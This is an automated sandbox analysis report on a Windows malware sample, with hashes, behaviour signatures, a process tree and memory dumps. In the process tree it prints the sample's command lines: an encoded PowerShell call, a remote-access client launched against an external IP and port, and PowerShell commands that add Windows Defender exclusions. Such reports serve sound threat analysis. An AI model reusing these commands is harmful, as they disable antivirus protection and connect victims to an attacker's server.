Analysis

  • max time kernel
    281s
  • max time network
    180s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08/10/2022, 04:47

General

  • Target

    ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe

  • Size

    28KB

  • MD5

    4fe29c0e5f183c311dd93fc8c5d9260f

  • SHA1

    d8e138002f99c09c87767715c4dadfc19e825273

  • SHA256

    ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b

  • SHA512

    1e0bb6091903282a94bd0e5581b84c29f8295711f96952b058e215b25c8bbdc47dd54a35b5c5a3c2eb2e1100ca6840586169931dbcd33564ebe69a36229ca918

  • SSDEEP

    768:3MXghTSHqcccccccccccccccABcZei8JgEiy:3MXgh9c4i8J8y

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 29 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
    "C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3092
    • C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
      C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
      2⤵
        PID:4980
      • C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
        C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
        2⤵
          PID:4988
        • C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
          C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
          2⤵
            PID:4888
          • C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
            C:\Users\Admin\AppData\Local\Temp\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4708
            • C:\Windows\explorer.exe
              "C:\Windows\explorer.exe"
              3⤵
              • Modifies Installed Components in the registry
              • Enumerates connected drives
              • Drops file in Windows directory
              • Checks SCSI registry key(s)
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1972
              • C:\Windows\system32\ctfmon.exe
                ctfmon.exe
                4⤵
                  PID:1148
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 5.161.93.133 8880 MoJeNfPeJeauxfkdlslzbpk
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2512
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5028
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4812
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4996
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                    5⤵
                      PID:4896
            • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
              1⤵
              • Drops file in Windows directory
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:1336

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe.log

              Filesize

              1KB

              MD5

              76d9f8d999cb147ce7545532939a8f94

              SHA1

              f1f511c07f0a58b23c147259362b965d5bbb50f4

              SHA256

              79111aacc6f3b0f1bce63b3b9716bd9aaf100c578cc62d4fb1009cda7d6183f0

              SHA512

              783aed0e61bf01e1e4aac172f2cfc36c0aadd24a6de70b5e15f8dee58703bc695a19d4c872588e2d17358731a5d3a76d0db3db8f2a63b6ca7ef596c2b4cdb283

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              1KB

              MD5

              66382a4ca6c4dcf75ce41417d44be93e

              SHA1

              8132cbef1c12f8a89a68a6153ade4286bf130812

              SHA256

              a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

              SHA512

              2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Filesize

              45KB

              MD5

              5f640bd48e2547b4c1a7421f080f815f

              SHA1

              a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

              SHA256

              916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

              SHA512

              a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              16KB

              MD5

              843b253bc5c0e15eb98248c8bcd5ad04

              SHA1

              1c147bee2666fbf0de86f134905285f2d88793c5

              SHA256

              4587173c07c594363a6a6b9337f2cccf86670946c0e0110e8da792412beec510

              SHA512

              1f82354947bf9b7f778ec648c2bc3c6a954979acbb0eef4bd050977bf6633b4c697f776c8e45d50216a9eb9e53014e5bd094a1024e8d7d87144f45151aabcf95

            • memory/2512-422-0x0000000000400000-0x0000000000426000-memory.dmp

              Filesize

              152KB

            • memory/3064-167-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-141-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-125-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-126-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-127-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-128-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-129-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-130-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-132-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-131-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-133-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-134-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-135-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-136-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-137-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-138-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-139-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-140-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-172-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-142-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-143-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-144-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-145-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-146-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-147-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-148-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-149-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-150-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-151-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-152-0x0000000000B90000-0x0000000000B9C000-memory.dmp

              Filesize

              48KB

            • memory/3064-153-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-154-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-155-0x00000000057C0000-0x0000000005CBE000-memory.dmp

              Filesize

              5.0MB

            • memory/3064-156-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-171-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-158-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-159-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-160-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-161-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-162-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-163-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-164-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-165-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-166-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-123-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-168-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-169-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-170-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-157-0x00000000053C0000-0x0000000005452000-memory.dmp

              Filesize

              584KB

            • memory/3064-124-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-120-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-174-0x0000000005520000-0x000000000552A000-memory.dmp

              Filesize

              40KB

            • memory/3064-175-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-176-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-177-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-178-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-179-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-180-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-181-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-182-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-183-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-184-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-185-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-186-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-187-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-207-0x0000000008300000-0x00000000083BE000-memory.dmp

              Filesize

              760KB

            • memory/3064-208-0x0000000008440000-0x00000000084D2000-memory.dmp

              Filesize

              584KB

            • memory/3064-209-0x0000000008550000-0x0000000008572000-memory.dmp

              Filesize

              136KB

            • memory/3064-211-0x0000000008580000-0x00000000088D0000-memory.dmp

              Filesize

              3.3MB

            • memory/3064-121-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-122-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3064-173-0x0000000077DB0000-0x0000000077F3E000-memory.dmp

              Filesize

              1.6MB

            • memory/3092-303-0x0000000008A10000-0x0000000008A2A000-memory.dmp

              Filesize

              104KB

            • memory/3092-263-0x0000000006D90000-0x00000000073B8000-memory.dmp

              Filesize

              6.2MB

            • memory/3092-287-0x0000000007940000-0x000000000798B000-memory.dmp

              Filesize

              300KB

            • memory/3092-291-0x0000000007CA0000-0x0000000007D16000-memory.dmp

              Filesize

              472KB

            • memory/3092-302-0x0000000009480000-0x0000000009AF8000-memory.dmp

              Filesize

              6.5MB

            • memory/3092-282-0x0000000006C00000-0x0000000006C66000-memory.dmp

              Filesize

              408KB

            • memory/3092-258-0x0000000000FE0000-0x0000000001016000-memory.dmp

              Filesize

              216KB

            • memory/3092-283-0x0000000007530000-0x0000000007596000-memory.dmp

              Filesize

              408KB

            • memory/3092-286-0x0000000007500000-0x000000000751C000-memory.dmp

              Filesize

              112KB

            • memory/4708-352-0x00000000017F0000-0x00000000017F6000-memory.dmp

              Filesize

              24KB

            • memory/4708-345-0x0000000000400000-0x0000000000444000-memory.dmp

              Filesize

              272KB

            • memory/4708-355-0x000000000AEF0000-0x000000000AF8C000-memory.dmp

              Filesize

              624KB

            • memory/4812-586-0x0000000009730000-0x00000000097C4000-memory.dmp

              Filesize

              592KB

            • memory/4812-550-0x0000000007B60000-0x0000000007EB0000-memory.dmp

              Filesize

              3.3MB

            • memory/4812-555-0x00000000080B0000-0x00000000080FB000-memory.dmp

              Filesize

              300KB

            • memory/4812-572-0x0000000009450000-0x0000000009483000-memory.dmp

              Filesize

              204KB

            • memory/4812-573-0x0000000009410000-0x000000000942E000-memory.dmp

              Filesize

              120KB

            • memory/4812-582-0x0000000009490000-0x0000000009535000-memory.dmp

              Filesize

              660KB

            • memory/4812-789-0x00000000096E0000-0x00000000096FA000-memory.dmp

              Filesize

              104KB

            • memory/4812-794-0x00000000096D0000-0x00000000096D8000-memory.dmp

              Filesize

              32KB